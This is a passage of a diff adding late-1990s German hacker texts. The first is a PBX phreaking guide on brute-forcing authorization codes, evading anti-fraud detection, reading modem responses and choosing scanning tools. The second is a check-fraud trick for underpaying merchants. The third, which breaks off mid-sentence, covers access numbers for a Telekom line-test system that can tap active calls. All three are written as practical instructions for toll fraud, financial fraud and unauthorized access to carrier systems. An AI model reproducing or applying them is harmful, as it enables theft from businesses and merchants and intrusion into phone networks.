+        Falls einige (wegen Mama und Papa) noch nie im Ausland angerufen haben
+        und sich mit internationalen Vorwahlen nicht so auskennen kommen hier
+        einige CountryCodes zur Anwahl des gew�nschten Landes und/oder zum
+        šberpr�fen mit den HCD's oder zu was auch immer...
+
+        CountryCode                             Land
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                +49                           - Deutschland
+                 +1                           - USA
+                +31                           - Niederlande
+                +27                           - S�dafrika
+                +45                           - D„nemark
+                +46                           - Schweden
+
+        Und zur Erg„nzung noch einige Vorwahlziffern f�r Inlands- bzw.
+        Auslandsanrufe.
+
+        Vorwahl (national/international)        Land
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                0/00                          - Deutschland
+                1/011                         - USA / Canada
+                0/009                         - Schweden
+
+        Das W„hlen von internationalen Nummern gestaltet sich dann also
+        wie folgt:
+        Man w„hlt die internationale Vorwahl, dann den CountryCode und dann
+        die Nummer ohne nationale Vorwahlziffer ...
+
+        Um also von Schweden aus Mrs. Dorothy Mitchel anzurufen um ihr zu
+        erkl„ren, was ihr geliebter Burt auf der Arbeit so treibt w„hlt man
+        ganz einfach:
+                        009-1-206-363-7818
+ int.Vorwahl in Schweden^^^ | ||| ^^^~^^^^Nummer der netten Mrs. Mitchel
+         CountryCode der USA^ ^^^AreaCode von Seattle, Washington
+                                 (dort wohnt sie, die Žrmste)
+
+   3. Problem: Gut ich kenne den Aufbau.
+               Wie kann ich das jetzt am Besten scannen?
+        Nun, das Scannen ist weniger schwer. Es ist nur wichtig wie man sie
+        scannt. Am sichersten ist es immernoch per Hand mit einem handels-
+        �blichen Telefon zu scannen. Auf Dauer ist dies jedoch sehr anstrengend
+        und erm�dent. Deshalb steigt man nach dem Herausfinden des Codes besser
+        auf einen automatischen Scanner zur�ck. Dieser sollte einige wichtige
+        Features besitzen.
+        Diese sind:     - dial delayer
+                        - dictionary support
+                        - m”glichst viel Zuf„lligkeit
+        Aus diesen Gr�nden machen sich Scripts (z.B. mit TeleMate), die zum
+        VMB Scannen brauchbar sein k”nnen, zum PBX Scannen sehr schlecht,
+        da ben”tigte Features nur schwer erreicht werden k”nnen. Einige Gute
+        Programme findet ihr im entspechenden Kapitel dieses Documents.
+        Wichtig sind diese Funktionen aus dem Grund, das viele PBX'en
+        Systeme zur Erkennung von Hackern benutzen. Diese Anti-Fraud-Devices
+        suchen meist gleichm„áigen Pattern um Scannen zu erkennen.
+        Die Such-Pattern triggern meist:
+                a) - zu viele Calls in einer bestimmten Zeitspanne
+                b) - gleiche Abst„nde zwischen Calls mit falschem Code
+                c) - gleiche Zielrufnummer mit falschem Code
+                d) - zu schnelles Tippen bzw. exakt gleiche Zeitspannen zw. den
+                     Tasten und gleiche L„nge der TouchTonez
+                e) - zu viele falsche Versuche
+                f) - Such-Pattern bei Codez gefunden (meist gleiche Abst„nde
+                     zwischen den falschen Codez oder andere Žhnlichkeiten)
+        Viele dieser Pattern kann man �berlisten:
+         zu:    a) - mehrere PBX'en scannen / m”glichst zuf„llige Reihenfolge
+                b) - zuf„llige Wartezeit zwischen den Calls
+                c) - eine Textdatei mit GUTEN Zielrufnummern benutzen
+                     -> in m”glichst zuf„lliger Reihenfolge
+                d) - dial delayer benutzen -> zuf„llige L„nge der TouchTonez
+                     und zuf„llige Zeitspanne zwischen den einzelnen Tasten
+                e) - wenn man mehrere PBX'en scannt (a) dann bekommen die auch
+                     nicht besonders viele Versuche in einer best. Zeitspanne
+                f) - nach M”glichkeit immer vermeiden sequentiell zu scannen,
+                     dictionary in zuf„lliger Reihenfolge abscannen
+        So, nun h„tten wir die technische Seite des Scannens betrachtet. Diese
+        ganzen Tricks kann man mit den richtigen Programmen mehr oder weniger
+        gut erreichen. Kommen wir nun zur psychischen Seite der ganzen Ange-
+        legenheit. Da die Angestellten der Firma und die Operatoren des Systems
+        unf„hig sind sich einen zuf„lligen Code zu merken w„hlen sie meistens
+        einen sehr primitiven Code aus.
+        Zum Beispiel:   1234 / 2378 / 1111 / 9876 / 0101 / 7272 ...
+        Deshalb ist es sehr ratsam mit einem Dictionary, das m”glichst viele
+        Lamer Codez enth„lt, zu scannen. Wenn dann ungef„hr 100-300 solcher
+        Codez nichts bringen, kann man dann auf zuf„lliges Scannen zur�ck-
+        greifen. Dabei sollte man die schon (durchs dictionary) gew„hlten
+        Nummern als bereits gew„hlt kennzeichnen um sich das erneute W„hlen
+        dieser zu ersparen (bei 40 Sekunden/Anruf, machen 250 Anrufe 10000
+        Sekunden, also ca. 2,8 Stunden.. bei Benutzung von bestimmten Sicher-
+        heitsvorkehrungen (z. B. dial-delayer) verbraucht man pro Anruf noch
+        mehr Zeit..).
+
+   4. Problem: Wie erkenne ich das mein Scannen erfolgreich war?
+        Nun, wenn man Gl�ck hat legt das System nach der Ansage
+        (z.B. "Sorry! You're PIN is invalid") auf. Dann braucht man nur darauf
+        zu warten, daá das Modem ein NO CARRIER zur�ckliefert, mit anderen
+        Worten kein Besetztzeichen erkennt. Diesesbekommt man n„mlich meist
+        (bei einer digitalen VST) ca. 10 sek. nachdem die PBX aufgelegt hat.
+        Bei anderen kann es auch sein das man keine Ansage sondern eine Art
+        Alarmton erh„lt. Falls dieser von eurem Modem als BUSY erkannt wird
+        kann das selbe Vorgehen zum Ziel f�hren. Falls nicht kann dieses
+        Alarmsignal meist als neuer W„hlton erkannt werden.
+        Beispiele:
+                1) BUSY / NO CARRIER - Methode
+                   falscher Code:
+                        ATDT01300999,,543
+                        BUSY            ; nach z.B. 19 sek.
+                   richtiger Code:
+                        ATDT01300999,,123
+                        NO CARRIER      ; nach 30 sek.
+                2) DIALTONE - Methode
+                   falscher Code:
+                        ATDT01300889,,635W;
+                        OK              ; nach ca. 20 sek
+                   richtiger Code:
+                        ATDT01300889,,321W;
+                        NO DIALTONE     ; nach ca. 20 sek.
+                   ... hier kann es aber auch andersherum sein, dass der
+                   richtige Code ein OK zurueckgibt.
+
+        Fazit: Immer erst austesten wie eine PBX reagiert und wie das euer
+               Modem auffasst. Danach ueberlegen wie man das am
+               geschicktesten in Angriff nimmt ;-)
+
+        Falls keine genaue Erkennung dieser Zust„nde m”glich ist (wenn bei
+        falschem Code verschiedene Ansagen kommen und man mal BUSY und mal
+        NO CARRIER erh„lt) und eine Zielrufnummer verlangt wird (z.B. vor
+        dem Code [sind meist die Besten]) dann kann man dies ausnutzen. Man
+        w„hlt einfach eine Zielrufnummer aus, die einen bestimmten String
+        zur�ckliefert. Dazu eignen sich am besten Carriers und (wenn das Modem
+        sie erkennen kann) Faxe. Meist sind Carrier aber vorzuziehen da Faxe
+        meist nur eine Leitung haben und deshalb sehr leicht besetzt sein
+        k”nnen. Man kann dann auf eine Liste (am besten Inlandnummern des
+        Landes in dem sich die PBX befindet) mit Multiline-Systemen
+        zur�ckgreifen. Das sind z.B. Internet Provider (AOL, CompuServe, MSN,
+        MetroNet, Nacamar, kleinere Mailboxen mit Internetzugang), Universit„ts
+        bzw. andere Server (z.B.Tymnet) oder normale Mailboxen mit mehreren
+        Linez auf derselben Nummer (Ringdown). Man sollte beim Scannen eine
+        Liste dieser benutzen und den Scanner zuf„llig eine daraus ausw„hlen
+        lassen. Dazu das Beispiel:
+                3) CONNECT / FAX - Methode
+                   falscher Code:
+                        ATDT0130817777,,15186147712,,672
+                        NO CARRIER
+                   richtiger Code:
+                        ATDT0130817777,,17081825919,,999
+                        CONNECT 56700/V42BIS/X2
+                                - oder -
+                        ATDT0130817777,,15237567435,,999
+                        FAX
+                        NO CARRIER
+
+        Da es (wie schon beschrieben) viele PBX'en gibt, die nach dem Code
+        einen Alarmton -ODER- (bei Erfolg) einen neuen W„hlton bringen, erz„hl
+        ich jetzt wie man sowas scannt: Das Problem bei dieser Sache ist im
+        Prinzip, das Modems meist den Alarmton als W„hlton erkennen.. Dies kann
+        man aber ziemlich einfach austricksen und zwar so:
+                4) WŽHLTONE / ALARMTONE - Methode:
+                   falscher Code:
+                        ATDT0130822222,,1234W1W;
+                        OK
+                   richtiger Code:
+                        ATDT0130822222,,4321W1W;
+                        NO DIALTONE
+        Falls jemand das nicht verstanden haben sollte, hier die Erkl„rung:
+        In beiden F„llen (W„hlton oder Alarmton) wird beim ersten 'W' ein
+        W„hlton erkannt und danach eine '1' gew„hlt. Falls nun (immernoch)
+        der Alarmton zu h”ren ist, erkennt das Modem WIEDER einen W„hlton
+        und geht durch das Semikolon (';') mit einem fr”hlichen 'OK' zur�ck
+        zur Kommandoebene. Falls aber der 'echte' W„hlton kam wird wieder
+        eine '1' gew„hlt und der W„hlton verstummt bekanntlich nach der ersten
+        gew„hlten Ziffer. Dannach kann das Modem keinen W„hlton mehr erkennen
+        (dieser ist ja verstummt!) und das Modem bricht mit 'NO DIALTONE' ab.
+
+   Dies sollte das Prinzip und die Funktionsweise ausreichend erkl„ren...
+   Ein Wort noch an all Diejenigen, die meinen das sie ihren PC auch noch
+   zu anderen Dingen ben”tigen als zum Scannen: In Zeiten von rechenstarken
+   Prozessoren und billiger Hardware stellt es doch wohl kein Problem dar,
+   den Scanner unter einem MultiTasker (DESQview(/X), Linux, OS/2, WinNT/95)
+   laufen zu lassen, oder?
+
+
+-------------------------------------
+ Verschiedene Systeme/Service Promts
+-------------------------------------
+
+   In diesem Teil sind erstens ein paar weit verbreitete PBX Systeme
+   beschrieben und als kleiner Bonus noch ein paar Worte zu VoiceCom und
+   h„ufig auftretenden Promts.
+
+*=> Siemens Rolm CBX
+        Die ROLM CBX wird bekanntlich von Siemens Rolm Communications Inc.
+   vertrieben. Sie ist sehr flexibel und man kann sehr viele Dinge integrieren.
+   Sie unterst�tzt bis zu 20000 angeschlossene Telefone, man kann damit auch
+   interne LAN Netzwerke aufbauen und VoiceMail einbinden. Als VoiceMail System
+   wird ebenfalls von Siemens Rolm das PhoneMail System angeboten. Dieses hat
+   in den USA durch ANI (automated number identification) auch die M”glichkeit
+   in den Nachrichtenheader die Telefonnummer des Anrufers einzuf�gen. šber-
+   haupt wird bei Siemens Rolm stark auf Sicherheit gesetzt da das System in
+   der Lage ist automatisch ein Service Center zu informieren falls es Fehl-
+   funktionen gibt. Dazu geh”ren so gut wie alle Unregelm„áigkeiten, also wird
+   das Scannen (auch wenn *NIEMAND* da ist) sehr schnell bemerkt. Es gibt f�r
+   die ROLM CBX auch eine monitoring station mit 12 video lines wodurch man das
+   gesamte System �berwachen kann. Das System bietet zudem noch
+   "Call Transfering", also auch nach auáen zu Telefonieren. Ein anderes, sehr
+   interessantes Feature ist auch "Remote Diagnostics", wodurch man das gesamte
+   System von auáen �berpr�fen und ver„ndern kann (das ist ein Carrier).
+   Weitere Features sind noch: ISDN Unterst�tzung, komplett digitale
+   Kommunikation (digitale Telefone) und T1 Connects �ber Sateliten.
+   Siemens Rolm Communications Inc. arbeitet zudem noch mit IBM, DEC, Intel,
+   Microsoft, Tandem und PictureTel zusammen und bietet Kunden viel Support.
+   Weitere Information auf der SRCI Homepage: http://siemensrolm.com
+   und falls ihr mal an so einem PhoneMail System rumspielen wollt: 0130-810276
+
+*=> LUCENT/AT&T Definity Series
+        LUCENT/AT&T bietet mit dieser Serie komplexe Kommunikationshardware an,
+   wie zum Beispiel CBX/PBX Systeme, Telefone, VoiceMail und anderes. Das
+   CBX/PBX System basiert auf dem System 75 bzw. System 85 und als VoiceMail
+   Addons wird einerseits DEFINITY-AUDiX angeboten, welches auch als(nur) AUDiX
+   in andere PBX Systeme integriert werden kann. Zum anderen wird auch noch das
+   INTUITY AUDiX System angeboten, welches aber keine besonders interessanten
+   Features aufweiát. Alles in allem kann auch das System 75 (bzw. die weiteren
+   neu entwickelten Versionen) einen Carrier besitzen um das System von auáen
+   zu verwalten. Weitere Features (mit AUDiX) sind automatische Hilfe,
+   Heraustelefonieren (z. B. auch zur Benachrichtigung bei eingegangenen
+   Nachrichten), den INTUITY MESSAGE-MANAGER (eine art LAN) und verschiedene
+   andere Funktionen. Dies f„llt aber mehr in den Bereich des VMB Hackings..
+
+*=> LUCENT/AT&T SDN
+        Dieses System dient weitestgehend nur zum Anrufen bestimmter Nummern.
+   Man kann es relativ leicht an charakteristischen Ansagen erkennen.
+   Diese sind:  "Please enter the Number you're calling."
+                "The Code you've entered is not valid."
+   Der Prompt wo der Code eingeben werden soll, besteht aus einem kurzen, sich
+   wiederholenden Pieptones. Auáderdem existiert dieses Systen in beiden
+   Varianten, also einmal Nummer+CODE und einmal CODE+Nummer. Durch die Ansagen
+   kann man das Format allerdings sehr einfach herausfinden.
+
+
+                      ---------------------------------
+                                --- BONUS ---
+                      ---------------------------------
+
+   Hier nun noch zus„tzlich ein paar Worte zu einem speziellen Tonprompt, den
+   man beim Scannen recht h„ufig findet. Man erh„lt bei der Anwahl (eine
+   Beispielnummer w„re: 0130-825552, mit den Codes 0101, 0202, 0303, bei den
+   Codes geht nach einer Weile ein Carrier ran..) einen Ton und nach Eingabe
+   eines falschen Codes (meist 4 oder 6 stellig) erh„lt man die Ansage:
+   "The autorisation code or ID code you have dialed is invalid..."
+   Nach dieser Ansage gibt dieses System noch den Areacode aus dem man anruft
+   von sich, welcher von Deutschland aus meist '2BM' ist.
+   Ein Bekannter hat einmal eine 4 stellige dieser Bauart durchgescannt und nur
+   nutzloses Zeug & irgentwelche Servicesachen gefunden. Falls ihr dennoch so
+   etwas scannen wollt, empfehle ich ein dictionary zu verwenden, da hier meist
+   (wie ihr sehen k”nnt) sehr einfache Codes verwendet werden.
+   Falls jemand genauere Informationen hierzu haben sollte, so w„re ich diesen
+   nicht abgeneigt (meine e-Mail steht am Ende dieses Textes).
+
+                      ---------------------------------
+
+  "enter your cardnumber (and pin)" oder „hnliches:
+        Cardprompts sind immer wieder sch”n, da man hier, wenn man Gl�ck hat,
+   einfach den Operator tot nerven kann, um alles �ber diese Cards zu erfahren.
+   Dann kann man sich da unter Umst„nden solche CallingCards "kaufen" (getreu
+   Danny DeVito mit 'dem Geld anderer Leute' ;) und bis zum j�ngsten Gericht
+   (ok, ok, das ist ein wenig �bertrieben) mit seiner Oma telefonieren...
+
+                      ---------------------------------
+
+
+-------------------------------------------
+ Tools&Texte, die viel Arbeit erleichtern.
+-------------------------------------------
+
+   Hier folgt eine Liste brauchbarer Tools und derer Beschreibungen...
+   Ich gehe hier ausschlieálich auf PC Scanner (unter DOS) ein..
+   Wenn Ihr also einen Dialer f�r euren Amiga oder C64 braucht, wendet euch
+   einfach an einen eurer Freunde oder schaut mal im n„chsten h/p Board rein!
+
+*=> T-diAL v2.o1                        - von mir selbst (hehe ;)
+
+        T-diAL ist ein relativ neues Programm mit dem es m”glich ist so gut wie
+   alle Prompts, die sich �ber TouchTones bedienen lassen, zu scannen. Dies
+   wird durch ein komplett freies Setup m”glich. Allerdings kommen durch die
+   groáe Einstellfreiheit f�r HardCore PBX-Scanner einige Features etwas kurz..
+   Ich werde aber versuchen diese in Zukunft zu verbessern.
+
+   Vorteile:    - frei konfigurierbar
+                - dial-delayer
+                - einigermaáen gutes alarm!system
+                - scanning durch andere (touchtone) outdials
+                - theoretisch unbegrenzte (nicht �berpr�fte) Stellen
+                  (4 werden �berpr�ft)
+                - dictionary Unterst�tzung
+
+   Nachteile:   - keine zuf„lligen Zielrufnummern (aus ner Textdatei)
+                - ein paar bugz.. aber keine gravierenden.
+                  (es funktioniert jetzt auch mit Modems von USRobotics)
+
+*=> PBX-HACK                            - by van Hauser / THC
+
+        PBX-Hack ist, wie der Name schon sagt und im Gegensatz zu T-diAL,
+   nur f�r PBX-Systeme geschrieben.. Alle enthaltenen Features sind komplett
+   zuf„llig, was durchaus brauchbar ist. Einziges Problem dabei ist, mehrere
+   PBX'en zu finden die V™LLIG gleich sind, um die zuf„llige Anwahl der Systeme
+   zu nutzen. Die Multi-Version ist ja (leider) nicht der ™ffentlichkeit
+   zug„nglich. Der verbreiteten Version liegt auáerdem eine Kopie von einen
+   englische Text �ber PBX und Extender Hacking bei. Dieser ist einer der
+   wenigen wirklich guten PBX-Texte. Es handelt sich dabei zwar grӇtenteils
+   um die Praxis in den USA, was aber nicht so wichtig ist da man sowieso
+   meist Systeme in den USA scannt und dar�ber Bescheid wissen sollte.
+
+   Vorteile:    - alles zuf„llig (z.B. dial-delayer)
+                - mehrere Systeme gleichzeitig (bzw. abwechselnd) scan-bar
+                - 6(!) �berpr�fte Stellen (zuf„llig)
+                - scanning durch andere outdials m”glich
+                - Bonus: PBX & Extender Hacking Guide by Madrox/SIC
+
+   Nachteile:   - Zielrufnummern etwas umstaendlich zu handhaben
+                - keine dictionary Unterst�tzung
+
+*=> THC-Scan                            - auch by van Hauser / THC
+
+   Kommen wir nun zum allseits bekannten THC-Scan. Es l„át sich ziemlich
+   kurz beschreiben: _DER_ Tollfree (0130/00800) Scanner.
+   Aber Tollfree Scanning ist nicht Inhalt dieses Dokuments obwohl diese Art
+   Aktivit„t stark von N”ten ist um an die DialUp-Nummern zu kommen....
+   Jetzt aber (endlich, lechz...) zum eigentlichen Punkt. Man kann mit diesem
+   Tool auch PBX Systeme scannen. Dazu �bergibt man einfach das Scanpattern
+   als DialMask und schaut nach dem Scannen ganz einfach in die entsprechenden
+   Logfiles. Man kann auch im Config den SuccessBeepString so ver„ndern das
+   man akustisch informiert wird. Manche werden auch wollen das nach dem ersten
+   Erfolg automatisch aufgeh”rt wird weiter zu scannen. Dazu legt man einen
+   execute-Befehl auf die entsprechende Response, der eine Batch(oder irgentwas
+   anderes) ausf�hrt die mit (in diesem Fall) einem 'pause'-Befehl auf einen
+   Tastendruck wartet. Man kann auf diese Weise PBX'en bis 4 Stellen (bei den
+   Codez) zuf„llig und sonst mehrere Stellen nur �ber Textfile (dictionary)
+   Scanning erledigen. Was nicht (oder nur schwer) m”glich ist, ist PBX'en zu
+   scannen die eine Zielrufnummern _VOR_ dem Code wollen, da der Scanstring
+   daf�r einfach zu kurz ist.
+
+   Vorteile:    - gut konfigurierbar
+                - dictionary support
+
+   Nachteile:   - max. 4 Stellen zuf„llig
+                - zu kurzer Dialstring bzw. muss ueber Dialmask benutzt werden
+
+*=> Smart PBX Scanner                   - by plasmoid / deep/thc
+
+   Dieser Scanner basiert v”llig auf dictionary scanning und besonders billigen
+   Codez. Leider ist er noch nicht fertig und nur steht nur als kleine,
+   unvollendete beta-version zur Verf�hgung. In der fertigen Version werden
+   dann auch spezielle mathematische Features zur Generation einfacher Codez
+   bereit stehen.
+
+   Vorteile:    - gut konfigurierbar
+                - dictionary support mit Platzhaltern!
+                - dial delayer
+
+   Nachteile:   - keine zufaelligen Nummern
+
+---[beta note]---
+   Weitere Informationen stehen zu diesem Zeitpunkt leider nicht zur Verf�gung
+   und deshalb ist an dieser Stelle nur bisher in der beta implementiertes
+   zu finden.
+---[beta note]---
+
+*=> The Hacker's Compagnion             - by substance & / 9x
+
+   The Hacker's Compagnion ist kein PBX Hacker im eigentlichen Sinn, sondern
+   ein f�r Hacker geschriebener Kommunikationsscriptinterpreter. Damit kann
+   man im Prinzip f�r jede verschiedene PBX ein Script schreiben. Auch lassen
+   sich viele Dinge, wie ein dial-delayer, random Zielrufnummern und
+   dictionary code scanning sehr leicht realisieren. Einziges Problem daran
+   ist das der Interpreter unter bestimmten Vorrausetzungen ziemlich unstabil
+   sein kann, was aber bei PBX'en keine groáe Rolle spielt sondern eher mehr
+   bei Carrier Hacking ins Gewicht fallen kann. Hoffen wir mal das dieses Tool
+   in den n„chsten Versionen richtig stabil und damit sehr n�tzlich wird.
+
+   Vorteile:    - sehr leistungf„hige Scriptsprache um viele Features
+                  selbst programmieren zu k”nnen
+
+   Nachteile:   - keine šberpr�fung der Zufallszahlen
+                  (l„sst sich aber durch eine eigene neue Zufallsroutine
+                   �berbr�cken..)
+                - relativ unstabil unter verschiedenen Vorraussetzungen
+                  (je nach OS, Modem, ...)
+
+-------------------------------------------------------------------------------
+
+   Mit guten Texten sieht es dabei etwas mager aus.. Es gibt zwar sehr viele
+   englische Texte �ber dieses Thema aber nur wenige mit wirklich guten und
+   brauchbaren Informationen.. Zu den Guten geh”rt der PBX/EXTENDER Hacking
+   Text von Madrox/SIC der van Hauser's PBX-Hacker beiliegt. Dann gibt es
+   noch die Texte �ber ROLM PhoneMail und andere von 9x. Diese basieren aber
+   mehr auf VMB's und haben weniger mit PBX-Systemen zu tun. Die Documentation
+   von plasmoid's SPS wird wahrscheinlich auch recht ausf�hrlich. Ansonsten
+   kann man dann (nur?) noch auf Internet Suchmaschienen (z.B.Yahoo!, Lycos,
+   AltaVista... und was es da noch so gibt) zur�ckgreifen und sich auf die
+   Suche nach den gew�nschten Informationen machen. Wenn man allerdings ein
+   paar Erfahrungen gesammelt hat und lange genug am Zielsystem "herumspielt"
+   braucht man eh keine dummen Texte mehr, sondern meist nur die Programme,
+   die unserer grenzenlosen Faulheit zu Leibe r�cken. ;)
+
+
+-----------
+ Nachspann
+-----------
+
+   So das wars. Ich hoffe euch hat dieser Text etwas neues gelehrt und das
+   Lesen war einigermaáen vergn�glich bzw. ertr„glich. Wenn ihr mir unbedingt
+   sagen wollt wie lame ich bin, dann kontaktiert mich auf einer der folgenden
+   M”glichkeiten.
+
+   eMAIL:       gorfus@hotmail.com
+   BBS:         hacker's inn - to gorfus
+                terminal madness - to gorfus
+
+   Wenn ihr Gl�ck habt, k”nnt ihr mich auch im IRC (meist in #hack oder
+   #thc mit /server irc.stealth.net) finden..
+
+enyej,
+        gorfus / cpi\thc
+
+÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷
+Type Bits/KeyID    Date       User ID
+pub  1374/9CAFA255 1997/04/30 GoRfUS / cPI\tHC
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.3i
+
+mQC5AzNnr8EAAAEFXjSFYmoKZ7bbfSff7LOxHmtGz6z4gBlDTWWmGwoC+JZ+L+MS
+iflet2m9rbeG6FT0J5D6edLk3JnF/uDK/oiucV2FfrP7UPB3pdlZj8GNY3jzq6dP
++idIeL3G+Yi7+nW7gftNHHA3VfrTYKczt+e0PIvsuM5Dk7vG1JD/Y8GRqwJolEa3
+C4XZX1AOHW8dOjXTXjlo661Re9GaQsyJal9BtWkEZznlP792gZyvolUABRG0EEdv
+UmZVUyAvIGNQSVx0SEOJAMEDBRAzZ6/DP792gZyvolUBAZh6BV4t1ydbcCrtqN1A
+ga7Ei8F+5K0XjNCJY10bWL2bgW7sNjhkFLDtIr5fAAM3IX459hl9b3bZ8ZHyW5qN
+PuBu0XZUOoFx4LcpdVBuQbXY8hvNFMPyU7XWUlOOzmL+PhLY/SIW0e8GId+3YWsv
+hZvC/E+TY9HufWNF4i/NR4GPise9bzph8A0B1IpOjYQ3hw+jVVhhBdnLr9RlKhxj
+3XvgNqG8EQsZALdysHb94YwC
+=x6M7
+-----END PGP PUBLIC KEY BLOCK-----
+÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷
+

Papers/scheck.txt

@@ -0,0 +1,47 @@
+                                 
+                    ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛ
+                    Û        BILLIGER LEBEN MIT         Û
+                    Û        þþþþþþþþþþþþþþþþþþ         Û
+                    Û                                   Û
+                    Û            DOC HOLIDAY            Û
+                    Û            þþþþþþþþþþþ            Û
+                    ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ
+
+
+
+                              HEUTE: DER SCHECK
+
+
+Ein kleiner Trick, den ich zuletzt bei meinem Italienurlaub 1911 angewandt 
+habe:
+
+Wer auf Reisen ist, der tr„gt nat�rlich nicht viel Bargeld mit sich rum, und
+bezahlt, wie es sich f�r eine Person gehobenen Standes geh”rt, mit einem
+Scheck!
+
+Da ist es nat�rlich gut zu wissen, daá auf einem Scheck lediglich der in 
+Worten geschriebene Betrag g�ltig ist, gleichg�ltig welch sch”ne Zahl neben-
+dran steht. Das bedeutet im Klartext, dass wenn Ihr z.B. eine Zeche in H”he 
+von 250 Mark l”hnen m�sst, dann schreibt ihr auf den Scheck in Zahlen die 
+Zahl 250, jedoch in Worten einen niedrigeren Betrag wie z.B. "f�nfundzwanzig".
+
+Die Bank darf euer Konto dann n„mlich nur mit dem Betrag von 25 DM belasten!!
+Nach Adam Riese und Eva Klein habt ihr dann...... „hm, na gut, sagen wir mal
+mehrere Mark..., gespart!
+
+Der italienische Campingplatzvermieter schaut dann ganz sch”n in die R”hre,
+und kommt sich mindestens so verarscht vor wie Ihr im ganzen Urlaub an der
+Costa Cordalis, weil ihr komischerweise bei allem immer doppelt so viel 
+bezahlen musstet wie die Einheimischen! ;-))
+
+Ist zwar nicht gerade die feine Art, aber macht Spass und spart unter 
+Umst„nden eine Menge Geld!
+
+PS: Passieren kann einem dabei eigentlich nichts, da man sich immer mal
+    verschreiben kann!!
+
+
+    Gruss,
+          Doc Holiday
+
+

Papers/sept.txt

@@ -0,0 +1,295 @@
+
+
+
+
+
+
+
+                              Spass mit SEPT 
+
+
+                        written in 1997 by Hitronic 
+ 
+ 
+
+
+
+
+
+                         1. Einleitung 
+                         2. Was ist das SEPT? 
+                         3. Wie kommt man ins SEPT? 
+                         4. Was faengt man mit SEPT an? 
+ 
+ 
+
+1. EINLEITUNG 
+ 
+Dieser Text dient nur zur Information und Aufklaerung. Jede Benutzung und
+insbesondere Abnutzung des SEPT surch Unbefugte ist widerrechtlich und somit
+auch strafbar. SEPT ist ein eingetragenes Warenzeichen der Deutschen Telekom
+AG. Der Autor erklaert sich fuer Handlungen, die im Zusammenhang mit der
+Nutzung von SEPT auf illegale Weise entstehen, nicht verantwortlich und
+uebernimmt keine Garantie fuer die Einhaltung der hier genannten Punkte. 
+ 
+ 
+
+2. WAS IST DAS SEPT? 
+ 
+Das Sept ist eines der zahlreichen Telekom-Leitungspruefsysteme und bietet im
+Gegensatz zu den nur Terminal-gesteuerten Pruefanlagen (z.B. "X10") den
+Vorteil, dass es von aussen mit jedem normalen Telefon erreichbar ist und sich
+ganz normal per MFV steuern laesst. Normalerweise wird es ausschliesslich von
+Telekom-Technikern zu Pruef- oder Entstoerzwecken benutzt, die sich unterwegs,
+z.B. am "Einsatzort" befinden und von dort aus Pruefungen durchfuehren muessen.
+(Das Sept-System bietet zwar auch eine Terminal-Steuerung, jedoch moechte ich
+nicht weiter darauf eingehen, denn diese ist fuer uns nicht-Telekommitarbeiter
+schon von daher weitestgehend uninteressant, da wir wohl kaum die Gelegenheit
+haben werden, zum lokalen Pruef- bzw. Entstoerplatz zu kommen, um uns dort vor
+den Bildschirm zu setzen.) Das Sept kann dem Techniker per Sprachmenue z.B.
+mitteilen, ob bei einem bestimmten Anschluss die Widerstands- und
+Spannungswerte in Ordnung sind, ob der Telefonhoerer staendig danebenliegt oder
+auch ob die Endgeraete mit den normalen Werten arbeiten oder eine selbstgebaute
+Fremdkonstruktion vorliegt. (Das Sept bietet zusaetzlich einige
+Sonderfunktionen, z.B. Messen der Kabellaenge bis zum Teilnehmer oder 
+Aufschalten auf aktive Verbindungen etc.) Leider hat jedes Sept eine begrenzte
+Reichweite, d.h. dass mit einem Sept nur Anschluesse in der Entfernung von 
+40-70km geprueft werden koennen, so dass man um weiter weg liegende Anschluesse
+pruefen zu koennen sich Zugang zu mehreren Septs verscahffen muss. Ausserdem
+gilt zu beachten, dass nur normale analoge bzw. T-Net-Anschluesse getestet
+werden koennen, bei ISDN-Leitungen werden andere Systeme benutzt, die fuer uns
+zu kompliziert zu erreichen sind. 
+ 
+
+ 
+3. WIE KOMMT MAN INS SEPT? 
+ 
+Das Sept-System ist wie gesagt auf zwei Wegen zu erreichen, zum einen ueber das
+uns unzugaengliche Terminal beim Telekom-Pruefplatz zum anderen von jedem
+Telefon aus per MFV. Der letztgenannte ist der fuer uns interessantere, da wir
+wohl alle ein MVF-faehiges Telefon bzw. ein normales Telefon und einen MFV-
+Signalgeber zur Verfuegung haben. Nun sollte man noch wissen, hinter welcher
+Telefonnummer sich das Sept verbirgt und wie man es erkennt. Die Nummern
+bestehen immer aus 0117 und einer weiteren Zahlenfolge, meistens 7X52 
+(wobei das X manchmal auch weggelassen werden kann). Um nicht alle
+Moeglichkeiten aufzaehlen zu muessen, gebe ich Euch hier schnell einige
+Zugaenge mit auf den Weg, an denen ihr erstens die Zusammensetzung der
+Telefonnummern und zweitens den Sept-Meldeton ueberpruefen koennt. Zugang in
+Hamburg: 01175352, Kiel: 01177522, Luebeck: 0117752, Berlin 01177552 und
+letztendlich Muenchen: 01177352. Bei Anwahl der aufgelisteten Nummern aus dem
+jeweiligen Ort entstehen keine Telefongebuehren, wenn die Nummern von
+ausserhalb angewaehlt werden, entstehen die normalen Telefongebuehren, wobei
+die Rufnummern auf die jeweilige Stadt bezogen abgeaendert werden muessen; um
+z.B. den Hamburger Zugang zu erreichen, muss folgendes gewaehlt werden:
+040-1175352. Das Sept meldet sich mit einem Dreiklang, auf den ich nicht
+weiter eingehe, da er ueber die oben aufgelisteten Zugangsnummern von jedem
+selber angehoert werden kann. Nach dem Dreiklang muss man zunaechst das meist
